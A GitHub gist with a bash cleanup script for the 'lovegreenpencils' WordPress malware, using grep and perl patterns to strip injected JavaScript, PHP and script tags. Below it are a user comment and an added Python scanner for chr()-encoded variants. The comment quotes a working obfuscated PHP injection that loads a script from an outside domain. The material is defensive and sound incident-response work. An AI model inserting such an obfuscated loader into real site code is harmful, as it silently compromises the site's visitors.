@black-dragon74
Created December 2, 2020 21:04
Fixes the lovegreenpencils WordPress malware
#!/bin/bash
# Regex to fix DB is: "s/<script[\s\S]*?>[\s\S]*?<\/script>//g"
totalInfections=0

# fix_phase <phase number> <grep pattern> <perl substitution>
# Finds every file under the current directory matching the grep pattern,
# backs it up as <file>.perlbak and strips the injection with the substitution.
fix_phase() {
    local phase="$1" needle="$2" subst="$3" f
    local filesProcessed=0
    echo "Scanning....."
    # grep -Z plus read -d '' keeps file names with spaces intact; the process
    # substitution keeps the loop (and its counter) in the current shell.
    while IFS= read -r -d '' f; do
        # Don't fix the fixer itself :D
        if [[ "$f" == "./fix.sh" ]]; then
            continue
        fi
        # If a backup exists, we created it, don't process it again
        if [[ "$f" == *.perlbak ]]; then
            continue
        fi
        # Otherwise back up and fix the file
        echo "Found file $f"
        echo "Backing up and fixing the infection"
        echo
        # -0777 slurps the whole file so [\s\S]*? can match across line breaks
        perl -0777 -pi.perlbak -e "$subst" "$f"
        ((filesProcessed++))
    done < <(grep -rilZ -- "$needle" ./*)
    echo "Phase $phase complete. Processed $filesProcessed files."
    ((totalInfections += filesProcessed))
}

echo "Welcome to lovegreenpencils malware fixer by black-dragon74"
echo "This fix is divided into 3 phases."
echo "Phase 1 fixes the \`beckup\` files."
echo "Phase 2 fixes the header injections."
echo "Phase 3 fixes the deep rooted JS, PHP and JSON injections."
echo

# Phase 1: the appended JavaScript loader
read -rsn1 -p "Press any key to begin phase 1: "
clear
fix_phase 1 'Element.prototype.appendAfter' \
    's/Element\.prototype\.appendAfter[\s\S]*?\}\)\(\);//gi'

# Phase 2: the PHP header injection
read -rsn1 -p "Press any key to begin phase 2: "
clear
fix_phase 2 "REQUEST\['lt'\]" \
    's/<\?php \$v[\s\S]*?\?>//gi'

# Phase 3: the injected <script> tags pointing at dock.lovegreenpencils
read -rsn1 -p "Press any key to begin phase 3: "
clear
fix_phase 3 'lovegreenpencils' \
    "s/<script type='text\/javascript' src='https:\/\/dock\.lovegreenpencils[\s\S]*?<\/script>//gi"

# Processing complete.
echo
echo "Found, backed up and fixed $totalInfections infected files."
read -rsn1 -p "Processing complete. Press any key to exit. "
echo
exit 0
@abelbarraza3

I am seeing a trend of a new variation of char code being used.
<?php echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(32).chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(111).chr(114).chr(101).chr(46).chr(100).chr(111).chr(110).chr(116).chr(107).chr(105).chr(110).chr(104).chr(111).chr(111).chr(111).chr(116).chr(46).chr(116).chr(119).chr(47).chr(100).chr(101).chr(115).chr(116).chr(105).chr(110).chr(97).chr(116).chr(105).chr(111).chr(110).chr(46).chr(106).chr(115).chr(63).chr(122).chr(61).chr(105).chr(38).chr(105).chr(100).chr(61).chr(49).chr(49).chr(50).chr(38).chr(99).chr(108).chr(105).chr(100).chr(61).chr(53).chr(49).chr(50).chr(38).chr(115).chr(105).chr(100).chr(61).chr(55).chr(56).chr(57).chr(54).chr(51).chr(52).chr(53).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62); ?>
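The chr()-concatenated variant reported in the comment above slips past the fixer's grep patterns, because the literal `<script ... lovegreenpencils` string never appears in the file. As an added example (not part of the gist or of the comment), the following Python scanner decodes such chr() chains before looking for external script loaders; the sample theme file and its placeholder host are constructed, and the `scan_tree` helper mirrors the fixer's recursive scan while skipping the `.perlbak` backups it leaves behind.

```python
import os
import re

# One chr(N).chr(N)... concatenation, as in the variant reported above.
CHR_CHAIN = re.compile(r"chr\(\s*\d+\s*\)(?:\s*\.\s*chr\(\s*\d+\s*\))+")
CHR_CODE = re.compile(r"chr\(\s*(\d+)\s*\)")
# External script loader, matched both in plain text and in decoded chains.
SCRIPT_SRC = re.compile(r"<script[^>]*?\ssrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def decode_chr_chains(source):
    """Return the plaintext of every chr() chain found in source."""
    return ["".join(chr(int(n)) for n in CHR_CODE.findall(m.group(0)))
            for m in CHR_CHAIN.finditer(source)]


def find_injected_scripts(source):
    """Return the src URLs of <script> loaders, whether written plainly
    or hidden behind chr() concatenation."""
    found = SCRIPT_SRC.findall(source)
    for text in decode_chr_chains(source):
        found.extend(SCRIPT_SRC.findall(text))
    return found


def scan_tree(root, suffixes=(".php", ".js", ".json")):
    """Walk root like the fixer's grep -ril does and report hits per file,
    skipping the .perlbak backups the fixer creates."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".perlbak") or not name.endswith(suffixes):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                urls = find_injected_scripts(fh.read())
            if urls:
                hits[path] = urls
    return hits


# Constructed sample: a theme file whose loader is hidden behind chr();
# the host is a placeholder, not an indicator taken from the thread.
_LOADER = ("<script type='text/javascript' "
           "src='https://PLACEHOLDER.invalid/destination.js?id=112'></script>")
SAMPLE_PHP = ("<?php echo " + ".".join(f"chr({ord(c)})" for c in _LOADER)
              + "; ?>\n<?php get_header(); ?>\n")

if __name__ == "__main__":
    for url in find_injected_scripts(SAMPLE_PHP):
        print("obfuscated loader ->", url)
```

Run it against a site root with `scan_tree(".")` to get a per-file list of loader URLs before deciding what the phase-3 regex should strip.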
